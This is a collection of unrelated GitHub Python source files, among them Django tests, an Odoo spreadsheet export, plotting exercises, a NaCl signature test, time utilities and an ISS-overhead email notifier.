is not None)\n self.assertTrue(\"modelz\" in raised.args[0])\n\n def test_missing_app(self):\n \"\"\"\n Test that repeated app loading doesn't succeed in case there is an\n error. 
Refs #17667.\n \"\"\"\n app_cache = AppCache()\n # Pretend we're the master app cache to test populate().\n app_cache.master = True\n with override_settings(INSTALLED_APPS=('notexists',)):\n with self.assertRaises(ImportError):\n app_cache.get_model('notexists', 'nomodel', seed_cache=True)\n with self.assertRaises(ImportError):\n app_cache.get_model('notexists', 'nomodel', seed_cache=True)\n\n\nclass GetModelsTest(TestCase):\n def setUp(self):\n from .not_installed import models\n self.not_installed_module = models\n\n def test_get_model_only_returns_installed_models(self):\n self.assertEqual(\n app_cache.get_model(\"not_installed\", \"NotInstalledModel\"), None)\n\n def test_get_model_with_not_installed(self):\n self.assertEqual(\n app_cache.get_model(\n \"not_installed\", \"NotInstalledModel\", only_installed=False),\n self.not_installed_module.NotInstalledModel)\n\n def test_get_models_only_returns_installed_models(self):\n self.assertFalse(\n \"NotInstalledModel\" in\n [m.__name__ for m in app_cache.get_models()])\n\n def test_get_models_with_app_label_only_returns_installed_models(self):\n self.assertEqual(app_cache.get_models(self.not_installed_module), [])\n\n def test_get_models_with_not_installed(self):\n self.assertTrue(\n \"NotInstalledModel\" in [\n m.__name__ for m in app_cache.get_models(only_installed=False)])\n\n\nclass NotInstalledModelsTest(TestCase):\n def test_related_not_installed_model(self):\n from .not_installed.models import NotInstalledModel\n self.assertEqual(\n set(NotInstalledModel._meta.get_all_field_names()),\n set([\"id\", \"relatedmodel\", \"m2mrelatedmodel\"]))\n","repo_name":"eduromo/django","sub_path":"tests/app_loading/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"27169003460","text":"from xml import dom\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\nfrom io import BytesIO\nimport xlsxwriter\nimport base64\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass withholding_record_export(models.TransientModel):\n _name = \"withholding.record\"\n _description = \"Export Excel\"\n\n date_month = fields.Selection(string=\"Mes\", selection=[('01', 'Enero'),\n ('02', 'Febrero'),\n ('03', 'Marzo'),\n ('04', 'Abril'),\n ('05', 'Mayo'),\n ('06', 'Junio'),\n ('07', 'Julio'),\n ('08', 'Agosto'),\n ('09', 'Septiembre'),\n ('10', 'Octubre'),\n ('11', 'Noviembre'),\n ('12', 'Diciembre')])\n date_year = fields.Char(string=\"Año\", size=4)\n\n state = fields.Selection([('choose', 'choose'), ('get', 'get')], default='choose')\n txt_filename = fields.Char('filename', readonly=True)\n txt_binary = fields.Binary('file', readonly=True)\n\n @api.multi\n def generate_file(self):\n\n dominio = [('type', 'like', 'retencion'),\n ('month_year_inv', 'like', self.date_month + \"\" + self.date_year)]\n\n output = BytesIO()\n workbook = xlsxwriter.Workbook(output, {'in_memory': True})\n worksheet = workbook.add_worksheet()\n\n # Data\n # lst_payments = self.env['account.payment'].search([])\n lst_payments = self.env['account.payment'].search(dominio)\n\n # Start from the first cell. 
Rows and columns are zero indexed.\n row = 0\n col = 0\n\n merge_format = workbook.add_format({\n 'bold': 1,\n 'border': 1,\n 'align': 'center',\n 'valign': 'vcenter',\n 'text_wrap': 1})\n\n border = workbook.add_format({'text_wrap': 1, 'border': 1})\n\n worksheet.merge_range(\"A1:A3\", \"FECHA DE PAGO O RETENCIÓN\", merge_format)\n worksheet.merge_range(\"E1:G1\", \"MONTO DE LA RETRIBUCIÓN\", merge_format)\n worksheet.write(\"A4\", \"(dd/mm/aaaa)\",merge_format)\n worksheet.merge_range(\n \"B1:D1\", \"PERSONA QUE BRINDÓ EL SERVICIO\", merge_format)\n\n worksheet.merge_range(\"B2:B4\", \"TIPO DE DOCUMENTO\", merge_format)\n worksheet.merge_range(\"C2:C4\", \"N° DE DOCUMENTO\", merge_format)\n worksheet.merge_range(\"D2:D4\", \"RAZON SOCIAL\", merge_format)\n worksheet.merge_range(\"E2:E4\", \"MONTO BRUTO\", merge_format)\n worksheet.merge_range(\"F2:F4\", \"RETENCIÓN EFECTUADA\", merge_format)\n worksheet.merge_range(\"G2:G4\", \"MONTO NETO\", merge_format)\n\n row += 4\n\n # worksheet.set_row(0, 35, border)\n worksheet.set_column('A:A', 15)\n worksheet.set_column('D:D', 30)\n\n # Iterador\n for payment in lst_payments:\n # fecha\n fecha = ''\n if payment.payment_date:\n fecha = payment.payment_date.strftime(\"%d/%m/%Y\")\n\n for invoice in payment.invoice_ids:\n worksheet.write(row, col, fecha)\n worksheet.write(row, col + 1, invoice.partner_id.catalog_06_id.name or '')\n worksheet.write(row, col + 2, invoice.partner_id.vat or '')\n worksheet.write(row, col + 3, invoice.partner_id.name or '')\n worksheet.write(row, col + 4, invoice.amount_total or 0)\n worksheet.write(row, col + 5, payment.amount or 0)\n worksheet.write(row, col + 6, invoice.amount_total - payment.amount or 0)\n # worksheet.write(row, col + 7, payment.type or '')\n row += 1\n\n workbook.close()\n output.seek(0)\n\n self.write({\n 'state': 'get',\n 'txt_binary': base64.b64encode(output.getvalue()),\n 'txt_filename': \"retenciones.xlsx\"\n })\n return {\n 'type': 'ir.actions.act_window',\n 'name': 'Export Excel',\n 'res_model': 'withholding.record',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'target': 'new'\n }\n","repo_name":"kit9/DemoClienteVero","sub_path":"sunat/wizard/withholding_record.py","file_name":"withholding_record.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3901721939","text":"import matplotlib.pyplot as plt\nimport numpy as np\nx=np.linspace(0,5,11)\ny=x**2\n# print(x)\n# print(y)\n\n\n#Object Oriented\n\n# fig=plt.figure()\n# axes1=fig.add_axes([0.1,0.1,0.8,0.8])\n# axes1.plot(x,y,\"-r\")\n# axes1.set_title(\"Larger Plot\")\n# axes2=fig.add_axes([0.2,0.5,0.3,0.3])\n# axes2.plot(y,x,\"-b\")\n# axes2.set_title(\"Smaller Plot\")\n# plt.show()\n\n\n#Subplot using object oriented method\n\nfig=plt.figure()\nfig,axes=plt.subplots(nrows=1,ncols=2)\naxes.legend(loc=0)\naxes[0].plot(x,y)\naxes[0].set_title('First Plot')\n\naxes[1].plot(y,x)\naxes[1].set_title('Second Plot')\nplt.show()","repo_name":"Pra9jha/ML","sub_path":"Matplotlib_learning/Object_oriented_method.py","file_name":"Object_oriented_method.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26200716353","text":"import 
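# The in-memory export pattern used by generate_file in the record above,
# reduced to its core: write the workbook into a BytesIO buffer, then
# base64-encode the bytes for storage in a Binary field.
from io import BytesIO
import base64
import xlsxwriter

buf = BytesIO()
wb = xlsxwriter.Workbook(buf, {'in_memory': True})
ws = wb.add_worksheet()
ws.write(0, 0, 'hello')
wb.close()
buf.seek(0)
payload = base64.b64encode(buf.getvalue())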
turtle\n\nt=turtle\n\n\nturtle.pencolor('black')\nturtle.pensize(2)\n\nt.fillcolor('yellow')\nt.begin_fill()\n\nturtle.penup()\nturtle.goto(-90,90)\nturtle.pendown()\nturtle.forward(180)\nturtle.goto(-90, -90)\nturtle.left(90)\nturtle.forward(180)\n\nt.end_fill()\n\nt.fillcolor('red')\nt.begin_fill()\n\nt.penup()\nturtle.goto(-90,-90)\nturtle.pendown()\nt.right(90)\nt.forward(180)\nt.left(90)\nt.forward(180)\nt.goto(-90,-90)\nt.end_fill()\nturtle.hideturtle() \n\n\n","repo_name":"jalor2013/pythonstudy","sub_path":"230428/0428作业.py","file_name":"0428作业.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10797865123","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nclass MyCalendarTwo(object):\n\n def __init__(self):\n self.calendar = []\n self.overlap = []\n \n\n def book(self, start, end):\n \"\"\"\n :type start: int\n :type end: int\n :rtype: bool\n \"\"\"\n for s, e in self.overlap:\n if start < e and end > s:\n return False\n \n for s, e in self.calendar:\n if start < e and end > s:\n self.overlap.append([max(start, s), min(end, e)])\n \n self.calendar.append([start, end])\n return True\n\n","repo_name":"Xuan4dream/Leetcode","sub_path":"731_My_Calendar_II.py","file_name":"731_My_Calendar_II.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"46606556100","text":"from nacl.signing import SigningKey\nfrom nacl.encoding import HexEncoder, RawEncoder\nfrom nacl.signing import VerifyKey\nfrom nacl.exceptions import BadSignatureError\nimport pickle\n\ndata_to_sign = 'hello worldd'\nprivate_key_location = './private_key'\n\n# generate private key\n# private_key = SigningKey.generate()\n# f = open(private_key_location, 'wb')\n# pickle.dump(private_key, f)\n# f.close()\n\n# read private key from file\nf = open(private_key_location, 'rb')\nprivate_key = pickle.load(f)\nf.close()\n\n# get public key\npublic_key = private_key.verify_key.encode(encoder=RawEncoder)\n# print(public_key)\npublic_key = bytes.hex(public_key)\n\nprint(public_key)\nprint(len(public_key))\n# print(bytes.fromhex(public_key))\n# exit()\n\n# sign\nsigned_hex = private_key.sign(data_to_sign.encode('utf-8'), encoder=RawEncoder)\nsignature_bytes = RawEncoder.decode(signed_hex.signature)\nsignature = bytes.hex(signature_bytes)\n\n# verify\nverify_key = VerifyKey(bytes.fromhex(public_key), encoder=RawEncoder)\n# signature_bytes = bytes.fromhex(signature)\ntry:\n # print(len(data_to_sign.encode('utf-8')))\n # print(len(bytes.fromhex(signature)))\n verify_key.verify(data_to_sign.encode('utf-8'), bytes.fromhex(signature), encoder=RawEncoder)\n print (\"The message is authentic.\")\nexcept BadSignatureError:\n print (\"The message is not authentic.\")","repo_name":"Min-Qi-Zhang/dotcoin-minicoin","sub_path":"flask-server/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74211165860","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os, sys, re\nfrom time import *\nfrom datetime import *\n\n\ndef strflocal(tm=None, format='%Y-%m-%d %H:%M:%S'):\n ''' String from local time\n :param tm: timestamp (seconds or milliseconds)\n :param format: output format\n :return: formatted time string\n '''\n if format == None:\n if tm is None:\n return 'None'\n elif tm == 0:\n return '0'\n 
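# A short behavioural check for the MyCalendarTwo record above: double
# bookings are remembered in self.overlap, so a third booking over the same
# span is rejected.
cal = MyCalendarTwo()
assert cal.book(10, 20) is True   # first booking
assert cal.book(10, 20) is True   # double booking, still allowed
assert cal.book(10, 20) is False  # would triple-book, rejected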
else:\n format = '%Y-%m-%d %H:%M:%S'\n\n if tm is None:\n tm = time()\n\n # convert floating point to int/long\n tm = int(tm)\n\n if len(str(tm)) == 13:\n # concvert milliseconds to seconds\n tm = tm/1000\n\n lt = localtime(tm)\n\n return strftime(format, lt)\n\n\ndef localfstr(spec, format=None):\n ''' Local time from string\n :param spec: time specification string\n :param format: format of time string\n :return: unix timestamp (seconds) since 1970, multiply with 1000 for milliseconds\n '''\n\n if format is not None:\n return int(mktime(datetime.strptime(spec, format).timetuple()))\n\n now = datetime.now()\n year = now.year\n month = now.month\n day = now.day\n hour = now.hour\n minute = now.minute\n second = now.second\n delta = 0\n\n _year = None\n\n for token in spec.split():\n\n if token.lower() in ['now', 'heute', 'jetzt']:\n pass\n elif token.lower() in ['yesterday', 'gestern']:\n day = day - 1\n elif token.lower() in ['at', 'vor', 'um']:\n pass\n elif token[:1] == '+' or token[:1] == '-' or token[-1] in 'smhd':\n if token[-1] in 'smhd':\n unit = token[-1]\n token = token[:-1]\n else:\n unit = 's'\n if token[:1] in '+-':\n op = token[:1]\n token = token[1:]\n else:\n op = '-'\n val = float(token.replace(',', '.'))\n delta = int(val * {'s': 1, 'm': 60, 'h': 60*60, 'd': 60*60*24}.get(unit, 's'))\n if op == '-': delta = delta * -1\n elif ':' in token:\n # 13:42[:05]\n tt = token.split(':')\n hour = int(tt[0])\n minute = int(tt[1])\n if len(tt) > 2: second = int(tt[2])\n else: second = 0\n elif '.' in token:\n # 27.9.16\n hour = minute = second = 0\n dt = token.split('.')\n day = int(dt[0])\n month = int(dt[1])\n if len(dt) > 2: _year = dt[2]\n elif '/' in token:\n # 9/27/16\n hour = minute = second = 0\n dt = token.split('/')\n month = int(dt[0])\n day = int(dt[1])\n if len(dt) > 2: _year = dt[2]\n elif '-' in token:\n # 2016-09-27\n hour = minute = second = 0\n dt = token.split('-')\n year = int(dt[0])\n month = int(dt[1])\n day = int(dt[2])\n else:\n # call expression parser\n pass\n\n if _year is not None:\n if len(_year) == 2: _year = str(year)[:2] + _year\n year = int(_year)\n\n return int(mktime(datetime(year, month, day, hour, minute, second).timetuple())) + delta\n","repo_name":"bstrebel/PyUtils","sub_path":"pyutils/timeutils.py","file_name":"timeutils.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"26659092347","text":"# Mile Stone 6\r\n\r\nimport math\r\nimport numpy as np\r\n\r\ndef write_file(coordinates):\r\n with open('E:\\KLA Hackathon 2023\\Milestone_Input\\Milestone 6\\output6.txt','a',newline='') as file:\r\n file.write('boundary \\n')\r\n file.write('layer 1 \\n')\r\n file.write('datatype 0 \\n')\r\n file.write('xy '+ ' '.join([str(elem) for elem in coordinates]) +' \\n')\r\n file.write('endel\\n')\r\n file.close()\r\n\r\n\r\ndef Input_file():\r\n data=[]\r\n file=open('E:\\KLA Hackathon 2023\\Milestone_Input\\Milestone 6\\Source.txt','r')\r\n for line in file: \r\n word=line.split()\r\n data.append(word)\r\n return data\r\n\r\n\r\ndef validattion_file():\r\n data=[]\r\n valid_corodinates=[]\r\n file=open('E:\\KLA Hackathon 2023\\Milestone_Input\\Milestone 6\\POI.txt','r')\r\n for line in file: \r\n word=line.split()\r\n data.append(word)\r\n \r\n for i in data:\r\n if('xy' in i):\r\n valid_corodinates.append(i)\r\n\r\n return valid_corodinates\r\n\r\n\r\ndef parse_data(data):\r\n coordinates=[]\r\n layers=[]\r\n datatype=[]\r\n\r\n for i in data:\r\n if('xy' 
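# A usage sketch for the time helpers above: strflocal accepts both second-
# and millisecond-resolution timestamps (13-digit values are divided by 1000),
# and localfstr with an explicit format round-trips a string to a unix
# timestamp.
ts = localfstr('2016-09-27 13:42:05', format='%Y-%m-%d %H:%M:%S')
assert strflocal(ts) == '2016-09-27 13:42:05'
assert strflocal(ts * 1000) == strflocal(ts)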
in i):\r\n            coordinates.append(i)\r\n        if('layer' in i):\r\n            layers.append(i)\r\n        if('datatype' in i):\r\n            datatype.append(i)\r\n\r\n    return coordinates\r\n\r\n\r\ndef area(lst):\r\n    lst=lst[2:]\r\n    lst = [eval(i) for i in lst]\r\n    x=[]\r\n    y=[]\r\n    \r\n    for i in range(len(lst)):\r\n        if(i%2==0):\r\n            x.append(lst[i])\r\n        else:\r\n            y.append(lst[i])\r\n\r\n    area=0.5*(np.abs(np.dot(x,np.roll(y,1))-np.dot(y,np.roll(x,1))))\r\n\r\n    return area\r\n\r\n\r\n\r\ndef distance(lst):\r\n    lst=lst[2:]\r\n    lst = [eval(i) for i in lst]\r\n    x=[]\r\n    y=[]\r\n    \r\n    for i in range(len(lst)):\r\n        if(i%2==0):\r\n            x.append(lst[i])\r\n        else:\r\n            y.append(lst[i])\r\n\r\n    res=[]\r\n\r\n    for i in range(len(x)-1):\r\n        res.append(math.sqrt(((x[i]-y[i])**2)+((x[i+1]-y[i+1])**2)))\r\n\r\n    return res\r\n\r\n\r\n\r\ndef validate(cord,valid):\r\n\r\n    data=[]\r\n    for x,y in zip(cord,valid):\r\n        data.append(x//y)\r\n    \r\n    for i in range(len(data)-1):\r\n        if(data[i]!=data[i+1]):\r\n            return False\r\n    return True\r\n\r\n\r\ndef perimeter(cord,valid):\r\n    peri1=0\r\n    peri2=0\r\n\r\n    for x,y in zip(cord,valid):\r\n        peri1+=x\r\n        peri2+=y\r\n    \r\n    if(peri1==peri2):\r\n        return True\r\n    else:\r\n        return False\r\n\r\n\r\ndef npangle(lst):\r\n    lst=lst[2:]\r\n    lst = [eval(i) for i in lst]\r\n    x=[]\r\n    y=[]\r\n    angle=[]\r\n\r\n    for i in range(len(lst)):\r\n        if(i%2==0):\r\n            x.append(lst[i])\r\n        else:\r\n            y.append(lst[i])\r\n\r\n    for i in range(len(x)-2):\r\n        ang = math.degrees(math.atan2(y[i+2]-y[i+1], x[i+2]-x[i]) - math.atan2(y[i]-y[i+1], x[i]-x[i+1]))\r\n        angle.append(round(ang + 360) if ang < 0 else round(ang))\r\n\r\n    return angle\r\n    \r\n\r\n\r\ndef angle(lst):\r\n    lst=lst[2:]\r\n    lst = [eval(i) for i in lst]\r\n    x=[]\r\n    y=[]\r\n    \r\n    for i in range(len(lst)):\r\n        if(i%2==0):\r\n            x.append(lst[i])\r\n        else:\r\n            y.append(lst[i])\r\n\r\n    \r\n    numerator=[]\r\n    denominator=[]\r\n    ratio=[]\r\n    anglerad=[]\r\n    angledeg=[]\r\n\r\n    for i in range(len(x)-2):\r\n        numerator.append(y[i+1]*(x[i]-x[i+2])+y[i]*(x[i+2]-x[i+1])+y[i+2]*(x[i+1]-x[i]))\r\n        denominator.append((x[i+1]-x[i])*(x[i]+x[i+2])+(y[i+1]-y[i])*(y[i]+y[i+2]))\r\n        ratio.append(numerator[i]/denominator[i])\r\n\r\n        anglerad.append(math.atan(ratio[i]))\r\n        angledeg.append((anglerad[i]*180)/math.pi);\r\n\r\n        if(angledeg[i]<0):\r\n            angledeg[i] = 180+angledeg[i]\r\n\r\n    return angledeg\r\n\r\n\r\ndef check_angle(angle1,angle2):\r\n\r\n    cnt=0\r\n\r\n    for i in range(len(angle1)):\r\n        if(angle1[i]==angle2[i]):\r\n            cnt+=1\r\n\r\n    if(cnt>len(angle1)/2):\r\n        return True\r\n    else:\r\n        return False\r\n\r\n\r\n\r\n\r\ndef check_polygon(coord,valid_cord):\r\n    result=[]\r\n    \r\n    valangle=npangle(valid_cord)\r\n    valarea=area(valid_cord)\r\n    \r\n    #print(valangle)\r\n    #print(npangle(coord[2]))\r\n\r\n    for i in coord:\r\n        iangle=angle(i)\r\n        iarea=area(i)\r\n        if(iarea==valarea):\r\n            result.append(i)\r\n        elif(iangle==valangle):\r\n            result.append(i)\r\n    \r\n    return result\r\n    \r\n    \r\n\r\n\r\n\r\ndef main():\r\n    data=Input_file()\r\n    valid_cord=validattion_file()\r\n    coordinates=parse_data(data)\r\n    result=check_polygon(coordinates,valid_cord[0])\r\n\r\n    print(len(result))\r\n    for i in result:\r\n        write_file(i[1:])\r\n\r\n\r\nif __name__==\"__main__\":\r\n    main()","repo_name":"NavinAananthan/KLA-Tencor-Hackathon","sub_path":"Milestone6.py","file_name":"Milestone6.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"44115702209","text":"import unittest\nfrom srm2.common import fcst\nimport 
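# A numeric sanity check for the shoelace formula in area() above, assuming
# the record's flattened token layout in which the first two entries (the
# literal 'xy' and a point count) are skipped: a unit square should give 1.
sq = ['xy', '4', '0', '0', '1', '0', '1', '1', '0', '1']
assert area(sq) == 1.0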
\n\n\n# FCST management\nclass TestFCSTCase(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n self.obj = fcst.TestFcst()\n print(\"----test_fcst start----\")\n\n # FCST week list\n def testForcastWeek_success(self):\n msg = self.obj.testForcastWeek()\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # FCST list query success\n def testFCSTlist_success(self):\n msg = self.obj.testFCSTlist()\n msg1 = msg.get('code')\n self.assertEqual(200,msg1,'fail')\n\n # MRP detail query success\n def testMRPlist_success(self):\n msg = self.obj.testMRPlist(forecastWeek='2021年-第10周', forecastVersion='2021030502')\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, '')\n\n # Delivery reply import success\n def testMRPImportFile_success(self):\n filepath = r'D:\apache-jmeter-5.3\apache-jmeter-5.3\testdata\import.txt'\n with open(filepath,'r') as f:\n filenames = f.readlines()\n # print(filenames)\n for line in filenames:\n filename = line.strip('\\n')\n # print(filename)\n f2 = open(filename, 'rb')\n file = (filename, f2, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n msg = self.obj.testMRPImportFile(file=file, forecastWeek='2021年-第10周', forecastVersion='2021030502')\n print(msg)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, filename + 'fail')\n f2.close()\n\n # FCST detail list query success\n def testForecast_success(self):\n msg = self.obj.testForecast()\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # MRP detail export success\n def testMRPDetail_success(self):\n t = time.time()\n msg = self.obj.testMRPDetail(forecastWeek='2021年-第10周',forecastVersion='2021030502',t=t)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # MRP summary list query success\n def testMRPSum_success(self):\n msg = self.obj.testMRPSum(forecastWeek='2021年-第10周', forecastVersion='2021030502')\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # MRP summary export success\n def testMRPExport_success(self):\n t = time.time()\n msg = self.obj.testMRPExport(forecastWeek='2021年-第10周',forecastVersion='2021030502',t=t)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # Export delivery reply data\n def testMRPAsyncExport_success(self):\n t = time.time()\n msg = self.obj.testMRPAsyncExport(forecastWeek='2021年-第10周', forecastVersion='2021030502', t=t)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # MRP unlock\n def testMRPunlock_success(self):\n msg = self.obj.testMRPunlock(id='')\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # FCST detail list - confirm\n def testForecastConfirm_success(self):\n ids = []\n msg = self.obj.testForecastConfirm(id=ids)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # FCST detail list - cancel confirmation\n def testForecastUnconfirm_success(self):\n ids = []\n msg = self.obj.testForecastUnconfirm(id=ids)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n @classmethod\n def tearDownClass(self):\n print(\"----test_fcst end----\")\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"MiaZhang0/work","sub_path":"srm2/testcases/test_fcst.py","file_name":"test_fcst.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"15144953540","text":"#__author:\"longjin\"\n#date: 2019/10/12\n# -*- coding: UTF-8 -*-\n\nfrom selenium import webdriver\nimport os\nfrom time import sleep\n\ndef insert_img(driver, file_name):\n # base = 'E:\\\\python\\\\practice4\\\\framework\\\\report\\\\image\\\\'\n # file_path = base + file_name\n base_dir = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n base_dir = str(base_dir)\n print(base_dir)\n base_dir = base_dir.replace('\\\\', '/')\n print(base_dir)\n base = base_dir.split('test_case')[0]\n file_path = base + '/report/image/' + file_name\n driver.get_screenshot_as_file(file_path)\n\nif __name__ == '__main__':\n driver = webdriver.Chrome()\n driver.get('https://www.baidu.com')\n insert_img(driver, 'test_baidu.png')\n # driver.get_screenshot_as_file('E:\\\\python\\\\practice4\\\\framework\\\\report\\\\image\\\\baidu.png')\n sleep(2)\n driver.quit()","repo_name":"ljeleven/mypython","sub_path":"practice4/framework/test/common/screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"28807207989","text":"class OperatingSys():\n\tdef OPeratingSys(self,input_from_user):\n\t\timport platform\n\t\tmy_os=platform.system()\n\t\twith open('myOS.txt','w') as file:\n\t\t\tfile.writelines(str(my_os))\n\t\twith open('myOS.txt','r') as file:\n\t\t\tlines=file.read()\n\t\t\tfirst=lines.split('\\n',1)[0]\n\t\t\tprint(first)\n\t\t\tif(first=='Windows'):\n\t\t\t\timport os\n\t\t\t\tos.system('cls')\n\t\t\telse:\n\t\t\t\timport os\n\t\t\t\tos.system('clear')\n\t\tr=1\n\t\twhile r==1:\n\t\t\ta=input(\"Know Your Operating System\\nDo you want to know your Operating System (Y/N)\")\n\t\t\tif(a=='Y'):\n\t\t\t\timport platform\n\t\t\t\tmy_os=platform.system()\n\t\t\t\twith open('myOS.txt','w') as file:\n\t\t\t\t\tfile.writelines(str(my_os))\n\t\t\t\twith open('myOS.txt','r') as file:\n\t\t\t\t\tlines=file.read()\n\t\t\t\t\tfirst=lines.split('\\n',1)[0]\n\t\t\t\t\tprint(\"Your Operating System is \"+first)\n\t\t\tr=2\n","repo_name":"CryptAdvance/CryptAdvance","sub_path":"operatingsys.py","file_name":"operatingsys.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"803861452","text":"import time\nimport requests\nfrom datetime import datetime\nimport smtplib\n\nMY_LAT = 51.507351 # Your latitude\nMY_LONG = -0.127758 # Your longitude\nMY_EMAIL = \"email@mail.com\"\nMY_PASSWORD = \"password\"\n\n\ndef check_position():\n response = requests.get(url=\"http://api.open-notify.org/iss-now.json\")\n response.raise_for_status()\n data = response.json()\n\n iss_latitude = float(data[\"iss_position\"][\"latitude\"])\n iss_longitude = float(data[\"iss_position\"][\"longitude\"])\n\n # Your position is within +5 or -5 degrees of the ISS position.\n\n if abs(MY_LAT - iss_latitude) <= 5 and abs(MY_LONG - iss_longitude) <= 5:\n return True\n return False\n\n\ndef is_dark():\n parameters = {\n \"lat\": MY_LAT,\n \"lng\": MY_LONG,\n \"formatted\": 0,\n }\n\n response = requests.get(\n \"https://api.sunrise-sunset.org/json\", params=parameters)\n response.raise_for_status()\n data = response.json()\n sunrise = int(data[\"results\"][\"sunrise\"].split(\"T\")[1].split(\":\")[0])\n sunset = int(data[\"results\"][\"sunset\"].split(\"T\")[1].split(\":\")[0])\n\n time_now = datetime.now()\n\n if time_now.hour >= sunset or time_now.hour <= sunrise:\n return True\n return False\n\n\nwhile True:\n time.sleep(60)\n if check_position() and is_dark():\n print(\"look up\")\n with smtplib.SMTP(\"smtp.gmail.com\") as conn:\n conn.starttls()\n conn.login(MY_EMAIL, MY_PASSWORD)\n conn.sendmail(from_addr=MY_EMAIL, to_addrs=MY_EMAIL,\n msg=\"Subject:Look Up\\n\\nThe ISS is above you in the sky.\")\n\n# If the ISS is 
close to my current position\n# and it is currently dark\n# Then send me an email to tell me to look up.\n# BONUS: run the code every 60 seconds.\n","repo_name":"tloske/100-Days-of-Code-Projects","sub_path":"Day 33/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74110887779","text":"from flask import Flask, render_template\nfrom ._api import factory as api_factory\nfrom ._pages import factory as pages_factory\n\n\ndef app_factory(template_dir, static_dir):\n # initalizing the application\n app = Flask(\n __name__,\n static_folder=static_dir,\n template_folder=template_dir,\n )\n\n # creating the main route to the application\n @app.route(\"/\", methods=[\"GET\"])\n def main():\n return render_template(\"index.html\")\n\n # registering the api context to the application\n api_factory(app)\n\n # registering the blueprint context to the application\n pages_factory(app)\n\n # returning out the application\n return app\n\n\n# running the application in debug mode\nif __name__ == \"__main__\":\n app = app_factory()\n app.run(debug=True)\n","repo_name":"JacobBas/flask-preact-linear-regression","sub_path":"backend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6338202893","text":"edad = 56\n\nif edad < 30:\n if edad < 15:\n print(\"Eres un niño\")\n else:\n print(\"Eres un joven\")\nelse:\n if edad < 45:\n print(\"Ya no eres tan joven\")\n else:\n print(\"Decididamente ya no eres joven\")\n","repo_name":"jocarsa/python311","sub_path":"001-Ejercicio 1/008-Estructuras de control/002-condicional/003-anidacion.py","file_name":"003-anidacion.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37526856561","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\n\ndef split_my_data(df, train_pct):\n '''\n Takes in df, train_pct and returns 2 items:\n train, test\n\n When using this function, in order to have usable datasets, be sure to call it thusly:\n train, test = split_my_data(df, train_pct)\n '''\n return train_test_split(df, train_size = train_pct, random_state = 294)\n\n#### Handle Nulls Function ####\ndef handle_nulls(df):\n df.total_charges = df['total_charges'].fillna(df['monthly_charges'])\n return df\n\n#### Encoder Functions ####\ndef payment_type(df):\n df['pay_elec_check'] = np.where(df.payment_type == 'Electronic check', 1, 0)\n df['pay_mail'] = np.where(df.payment_type == 'Mailed check', 1, 0)\n df['pay_bank'] = np.where(df.payment_type == 'Bank transfer (automatic)', 1, 0)\n df['pay_cc'] = np.where(df.payment_type == 'Credit card (automatic)', 1, 0)\n df['pay_auto'] = np.where(df.payment_type == 'Credit card (automatic)', 1,\n np.where(df.payment_type == 'Bank transfer (automatic)', 1, 0))\n return df\n\ndef boolean_labeler(df, col):\n le = preprocessing.LabelEncoder()\n df[f'{col}_enc'] = le.fit_transform(df[col])\n return df\n\ndef 